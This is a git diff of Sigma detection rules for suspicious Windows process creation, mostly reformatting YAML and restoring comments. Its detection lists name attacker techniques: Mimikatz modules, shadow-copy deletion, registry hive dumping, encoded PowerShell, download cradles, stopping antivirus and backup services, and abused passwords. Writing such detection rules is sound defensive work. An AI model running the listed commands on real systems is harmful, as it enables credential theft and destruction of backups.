a/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml index 8e1fdeb85..7249e5ed2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_dir.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - \Users\Public\ - \$Recycle.bin - \Users\All Users\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml index b4fff0e27..959017988 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_tamper.yml @@ -1,16 +1,14 @@ title: Suspicious Windows Service Tampering id: ce72ef99-22f1-43d4-8695-419dcb5d9330 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: derived - - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b - type: obsoletes - - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: derived + - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b + type: obsoletes + - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b + type: obsoletes status: experimental -description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in - order to stop, pause or delete critical or important Windows services such as - AV, Backup, etc. As seen being used in some ransomware scripts +description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts references: - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html @@ -31,35 +29,35 @@ detection: EventID: 4688 Channel: Security selection_net_img: - - OriginalFileName: - - net.exe - - net1.exe - - NewProcessName|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe selection_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_sc_img: - - OriginalFileName: sc.exe - - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe selection_sc_cli: - CommandLine|contains: + CommandLine|contains: - ' stop ' - ' delete ' - ' pause ' selection_pwsh_img: - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_services: - CommandLine|contains: + CommandLine|contains: - 143Svc - Acronis VSS Provider - AcronisAgent @@ -72,7 +70,7 @@ detection: - AVG Antivirus - avgAdminClient - AvgAdminServer - - AVP1 + - AVP1 # Covers multiple AVP versions - BackupExec - bedbg - BITS @@ -80,10 +78,10 @@ detection: - Client Agent 7.60 - Core Browsing Protection - Core Mail Protection - - Core Scanning Server + - Core Scanning Server # Covers 'Core Scanning ServerEx' - DCAgent - - EhttpSr - - ekrn + - EhttpSr # Covers 'EhttpSry', 'EhttpSrv' + - ekrn # Covers 'ekrnEpsw' - Enterprise Client Service - epag - EPIntegrationService @@ -98,7 +96,7 @@ detection: - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance - HealthTLService - - MSSQLFDLauncher$ + - MSSQLFDLauncher$ # Covers 'SHAREPOINT', 'TPS', 'SBSMonitoring', etc. - hmpalertsvc - HMS - IISAdmin @@ -239,11 +237,8 @@ detection: - wozyprobackup - WRSVC - Zoolz 2 Service - condition: process_creation and (selection_services and (all of selection_net_* - or all of selection_pwsh_* or all of selection_sc_*)) + condition: process_creation and (selection_services and (all of selection_net_* or all of selection_pwsh_* or all of selection_sc_*)) falsepositives: - - Administrators or tools shutting down the services due to upgrade or removal - purposes. If you experience some false positive, please consider adding filters - to the parent process launching this command and not removing the entry + - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml index 184bedba8..dd39b7577 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_creation.yml @@ -1,8 +1,7 @@ title: Shadow Copies Creation Using Operating Systems Utilities id: b17ea6f7-6e90-447e-a799-e6c0a493d6ce status: test -description: Shadow Copies creation using operating systems utilities, possible credential - access +description: Shadow Copies creation using operating systems utilities, possible credential access references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ @@ -22,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shadow - create condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml index dc68ddca3..a67d11c75 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml @@ -12,8 +12,7 @@ references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware -author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil - Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 modified: 2022/11/03 tags: @@ -29,48 +28,46 @@ detection: EventID: 4688 Channel: Security selection1_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \wmic.exe - - \vssadmin.exe - - \diskshadow.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - wmic.exe - - VSSADMIN.EXE - - diskshadow.exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \wmic.exe + - \vssadmin.exe + - \diskshadow.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - wmic.exe + - VSSADMIN.EXE + - diskshadow.exe selection1_cli: - CommandLine|contains|all: - - shadow + CommandLine|contains|all: + - shadow # will match "delete shadows" and "shadowcopy delete" and "shadowstorage" - delete selection2_img: - - NewProcessName|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - NewProcessName|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection2_cli: - CommandLine|contains|all: + CommandLine|contains|all: - delete - catalog - - quiet + - quiet # will match -quiet or /quiet selection3_img: - - NewProcessName|endswith: \vssadmin.exe - - OriginalFileName: VSSADMIN.EXE + - NewProcessName|endswith: \vssadmin.exe + - OriginalFileName: VSSADMIN.EXE selection3_cli: - CommandLine|contains|all: + CommandLine|contains|all: - resize - shadowstorage - CommandLine|contains: + CommandLine|contains: - unbounded - /MaxSize= - condition: process_creation and ((all of selection1*) or (all of selection2*) - or (all of selection3*)) + condition: process_creation and ((all of selection1*) or (all of selection2*) or (all of selection3*)) fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate Administrator deletes Shadow Copies using operating systems utilities - for legitimate reason + - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml b/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml index d9d93f804..8e0bae151 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml @@ -1,8 +1,7 @@ title: Windows Shell/Scripting Processes Spawning Suspicious Programs id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde status: test -description: Detects suspicious child processes of a Windows shell and scripting processes - such as wscript, rundll32, powershell, mshta...etc. +description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. references: - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html author: Florian Roth (Nextron Systems), Tim Shelton @@ -26,12 +25,13 @@ detection: - \mshta.exe - \powershell.exe - \pwsh.exe + # - '\cmd.exe' # too many false positives - \rundll32.exe - \cscript.exe - \wscript.exe - \wmiprvse.exe - \regsvr32.exe - NewProcessName|endswith: + NewProcessName|endswith: - \schtasks.exe - \nslookup.exe - \certutil.exe @@ -41,24 +41,25 @@ detection: CurrentDirectory|contains: \ccmcache\ filter_amazon: ParentCommandLine|contains: + # FP - Amazon Workspaces - \Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1 - \Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1 - - \nessus_ + - \nessus_ # Tenable/Nessus VA Scanner filter_nessus: - CommandLine|contains: \nessus_ + CommandLine|contains: \nessus_ # Tenable/Nessus VA Scanner filter_sccm_install: ParentCommandLine|contains|all: - C:\MEM_Configmgr_ - \splash.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' - CommandLine|contains|all: + CommandLine|contains|all: - C:\MEM_Configmgr_ - \SMSSETUP\BIN\ - \autorun.hta - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}' ParentProcessName|endswith: \mshta.exe - NewProcessName|endswith: \mshta.exe + NewProcessName|endswith: \mshta.exe condition: process_creation and (selection and not 1 of filter_*) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml b/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml index f5953a1d3..92f38922c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_sysnative.yml @@ -1,8 +1,7 @@ title: Process Creation Using Sysnative Folder id: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab status: test -description: Detects process creation events that use the Sysnative folder (common - for CobaltStrike spawns) +description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) references: - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ author: Max Altgelt (Nextron Systems) @@ -20,8 +19,8 @@ detection: EventID: 4688 Channel: Security sysnative: - - CommandLine|contains: :\Windows\Sysnative\ - - NewProcessName|contains: :\Windows\Sysnative\ + - CommandLine|contains: :\Windows\Sysnative\ + - NewProcessName|contains: :\Windows\Sysnative\ condition: process_creation and sysnative falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml index 73229d3df..f2aa87a1f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_system_exe_anomaly.yml @@ -5,8 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold references: - https://twitter.com/GelosSnake/status/934900723426439170 - https://asec.ahnlab.com/en/39828/ -author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, - Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 modified: 2023/10/18 tags: @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \rundll32.exe - \services.exe @@ -69,21 +68,23 @@ detection: - \dwm.exe - \LsaIso.exe - \ntoskrnl.exe + # The below processes were seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/ - \wsmprovhost.exe - \dfrgui.exe filter_generic: - - NewProcessName|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - C:\Windows\WinSxS\ - - NewProcessName|contains: \SystemRoot\System32\ - - NewProcessName: - - C:\Windows\explorer.exe - - C:\Program Files\PowerShell\7\pwsh.exe - - C:\Program Files\PowerShell\7-preview\pwsh.exe + - NewProcessName|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + - C:\Windows\WinSxS\ + # - 'C:\avast! sandbox' + - NewProcessName|contains: \SystemRoot\System32\ + - NewProcessName: + - C:\Windows\explorer.exe + - C:\Program Files\PowerShell\7\pwsh.exe + - C:\Program Files\PowerShell\7-preview\pwsh.exe filter_wsl_windowsapps: - NewProcessName|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux - NewProcessName|endswith: \wsl.exe + NewProcessName|startswith: C:\Program Files\WindowsApps\MicrosoftCorporationII.WindowsSubsystemForLinux + NewProcessName|endswith: \wsl.exe condition: process_creation and (selection and not 1 of filter_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 75fbf21e3..4c9bdcc5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -1,8 +1,7 @@ title: Suspicious SYSTEM User Process Creation id: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 status: test -description: Detects a suspicious process creation as SYSTEM user (suspicious program - or command line parameter) +description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) references: - Internal Research - https://tools.thehacker.recipes/mimikatz/modules @@ -25,74 +24,75 @@ detection: Channel: Security selection: MandatoryLabel: S-1-16-16384 - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_special: - - NewProcessName|endswith: - - \calc.exe - - \wscript.exe - - \cscript.exe - - \hh.exe - - \mshta.exe - - \forfiles.exe - - \ping.exe - - CommandLine|contains: - - ' -NoP ' - - ' -W Hidden ' - - ' -decode ' - - ' /decode ' - - ' /urlcache ' - - ' -urlcache ' - - ' -e* JAB' - - ' -e* SUVYI' - - ' -e* SQBFAFgA' - - ' -e* aWV4I' - - ' -e* IAB' - - ' -e* PAA' - - ' -e* aQBlAHgA' - - vssadmin delete shadows - - reg SAVE HKLM - - ' -ma ' - - Microsoft\Windows\CurrentVersion\Run - - .downloadstring( - - .downloadfile( - - ' /ticket:' - - 'dpapi::' - - event::clear - - event::drop - - id::modify - - 'kerberos::' - - 'lsadump::' - - 'misc::' - - 'privilege::' - - 'rpc::' - - 'sekurlsa::' - - 'sid::' - - 'token::' - - vault::cred - - vault::list - - ' p::d ' - - ;iex( - - MiniDump - - 'net user ' + - NewProcessName|endswith: + - \calc.exe + - \wscript.exe + - \cscript.exe + - \hh.exe + - \mshta.exe + - \forfiles.exe + - \ping.exe + - CommandLine|contains: + # - 'sc stop ' # stops a system service # causes FPs + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' -decode ' # Used with certutil + - ' /decode ' # Used with certutil + - ' /urlcache ' # Used with certutil + - ' -urlcache ' # Used with certutil + - ' -e* JAB' # PowerShell encoded commands + - ' -e* SUVYI' # PowerShell encoded commands + - ' -e* SQBFAFgA' # PowerShell encoded commands + - ' -e* aWV4I' # PowerShell encoded commands + - ' -e* IAB' # PowerShell encoded commands + - ' -e* PAA' # PowerShell encoded commands + - ' -e* aQBlAHgA' # PowerShell encoded commands + - vssadmin delete shadows # Ransomware + - reg SAVE HKLM # save registry SAM - syskey extraction + - ' -ma ' # ProcDump + - Microsoft\Windows\CurrentVersion\Run # Run key in command line - often in combination with REG ADD + - .downloadstring( # PowerShell download command + - .downloadfile( # PowerShell download command + - ' /ticket:' # Rubeus + - 'dpapi::' # Mimikatz + - event::clear # Mimikatz + - event::drop # Mimikatz + - id::modify # Mimikatz + - 'kerberos::' # Mimikatz + - 'lsadump::' # Mimikatz + - 'misc::' # Mimikatz + - 'privilege::' # Mimikatz + - 'rpc::' # Mimikatz + - 'sekurlsa::' # Mimikatz + - 'sid::' # Mimikatz + - 'token::' # Mimikatz + - vault::cred # Mimikatz + - vault::list # Mimikatz + - ' p::d ' # Mimikatz + - ;iex( # PowerShell IEX + - MiniDump # Process dumping method apart from procdump + - 'net user ' filter_ping: - CommandLine: ping 127.0.0.1 -n 5 + CommandLine: ping 127.0.0.1 -n 5 filter_vs: ParentCommandLine|contains: \DismFoDInstall.cmd - NewProcessName|endswith: \PING.EXE + NewProcessName|endswith: \PING.EXE filter_config_mgr: ParentProcessName|contains: :\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\ filter_java: - CommandLine|contains: ' -ma ' + CommandLine|contains: ' -ma ' ParentProcessName|contains: - :\Program Files (x86)\Java\ - :\Program Files\Java\ ParentProcessName|endswith: \bin\javaws.exe - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\Java\ - :\Program Files\Java\ - NewProcessName|endswith: \bin\jp2launcher.exe + NewProcessName|endswith: \bin\jp2launcher.exe condition: process_creation and (all of selection* and not 1 of filter_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml b/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml index d939496ba..84f779aa1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_sysvol_access.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \SYSVOL\ - \policies\ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml index 480e26c71..f4a04bffb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_task_folder_evasion.yml @@ -1,15 +1,10 @@ title: Tasks Folder Evasion id: cc4e02ba-9c06-48e2-b09e-2500cace9ae0 status: test -description: 'The Tasks folder in system32 and syswow64 are globally writable paths. - - Adversaries can take advantage of this and load or influence any script hosts - or ANY .NET Application - - in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, - mshta, eventvwr - - ' +description: | + The Tasks folder in system32 and syswow64 are globally writable paths. + Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application + in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr references: - https://twitter.com/subTee/status/1216465628946563073 - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 @@ -29,13 +24,13 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - 'echo ' - 'copy ' - 'type ' - file createnew selection2: - CommandLine|contains: + CommandLine|contains: - ' C:\Windows\System32\Tasks\' - ' C:\Windows\SysWow64\Tasks\' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml index c4401ff49..df722b499 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_te_bin.yml @@ -1,14 +1,9 @@ title: Malicious Windows Script Components File Execution by TAEF Detection id: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b status: test -description: 'Windows Test Authoring and Execution Framework (TAEF) framework allows - you to run automation by executing tests files written on different languages - (C, C#, Microsoft COM Scripting interfaces - - Adversaries may execute malicious code (such as WSC file with VBScript, dll and - so on) directly by running te.exe - - ' +description: | + Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces + Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/ - https://twitter.com/pabraeken/status/993298228840992768 @@ -26,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \te.exe - - ParentProcessName|endswith: \te.exe - - OriginalFileName: \te.exe + - NewProcessName|endswith: \te.exe + - ParentProcessName|endswith: \te.exe + - OriginalFileName: \te.exe condition: process_creation and selection falsepositives: - It's not an uncommon to use te.exe directly to execute legal TAEF tests diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml index 7144b27f1..f88a62b08 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml @@ -1,20 +1,15 @@ title: Malicious PE Execution by Microsoft Visual Studio Debugger id: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 status: test -description: 'There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" - to launch specified executable and attach a debugger. - - This option may be used adversaries to execute malicious code by signed verified - binary. - +description: | + There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. + This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package. - - ' references: - https://twitter.com/pabraeken/status/990758590020452353 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/ - https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 -author: "Agro (@agro_sev), Ensar \u015Eamil (@sblmsrsn), oscd.community" +author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community date: 2020/10/14 modified: 2022/10/09 tags: @@ -30,9 +25,9 @@ detection: selection: ParentProcessName|endswith: \vsjitdebugger.exe reduction1: - NewProcessName|endswith: \vsimmersiveactivatehelper*.exe + NewProcessName|endswith: \vsimmersiveactivatehelper*.exe reduction2: - NewProcessName|endswith: \devenv.exe + NewProcessName|endswith: \devenv.exe condition: process_creation and (selection and not (reduction1 or reduction2)) falsepositives: - The process spawned by vsjitdebugger.exe is uncommon. diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml b/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml index 37197aba4..c6d2babc6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_userinit_child.yml @@ -20,10 +20,10 @@ detection: selection: ParentProcessName|endswith: \userinit.exe filter1: - CommandLine|contains: \netlogon\ + CommandLine|contains: \netlogon\ filter2: - - NewProcessName|endswith: \explorer.exe - - OriginalFileName: explorer.exe + - NewProcessName|endswith: \explorer.exe + - OriginalFileName: explorer.exe condition: process_creation and (selection and not 1 of filter*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml b/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml index ed4930d57..624b3bc80 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml @@ -1,9 +1,7 @@ title: Weak or Abused Passwords In CLI id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 status: test -description: Detects weak passwords or often abused passwords (seen used by threat - actors) via the CLI. An example would be a threat actor creating a new user via - the net command and providing the password inline +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -22,9 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # Add more passwords - Asd123.aaaa - - password123 + - password123 # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - '123456789' - P@ssw0rd! - Decryptme diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml index a89b3b5fc..b8b5e679f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml @@ -1,21 +1,19 @@ title: Usage Of Web Request Commands And Cmdlets id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d related: - - id: 1139d2e2-84b1-4226-b445-354492eba8ba - type: similar - - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 - type: obsoletes - - id: cd5c8085-4070-4e22-908d-a5b3342deb74 - type: obsoletes + - id: 1139d2e2-84b1-4226-b445-354492eba8ba + type: similar + - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 + type: obsoletes + - id: cd5c8085-4070-4e22-908d-a5b3342deb74 + type: obsoletes status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via CommandLine +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps -author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin - Songer @austinsonger +author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger date: 2019/10/24 modified: 2023/01/10 tags: @@ -29,7 +27,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - '[System.Net.WebRequest]::create' - 'curl ' - Invoke-RestMethod diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml b/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml index abf9c2b2e..244bae9b2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_whoami_as_param.yml @@ -1,8 +1,7 @@ title: WhoAmI as Parameter id: e9142d84-fbe0-401d-ac50-3e519fb00c89 status: test -description: Detects a suspicious process command line that uses whoami as first parameter - (as e.g. used by EfsPotato) +description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) references: - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: .exe whoami + CommandLine|contains: .exe whoami condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml b/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml index d45c9e252..1866c914b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_workfolders.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \control.exe + NewProcessName|endswith: \control.exe ParentProcessName|endswith: \WorkFolders.exe filter: - NewProcessName: C:\Windows\System32\control.exe + NewProcessName: C:\Windows\System32\control.exe condition: process_creation and (selection and not filter) falsepositives: - Legitimate usage of the uncommon Windows Work Folders feature. diff --git a/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml b/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml index 2ddea0c9a..f1133021d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml +++ b/sigma/builtin/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml @@ -1,9 +1,7 @@ title: Suspect Svchost Activity id: 16c37b52-b141-42a5-a3ea-bbe098444397 status: test -description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments - and is normally observed when a malicious process spawns the process and injects - code into the process memory space. +description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. references: - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 author: David Burkett, @signalblur @@ -21,13 +19,13 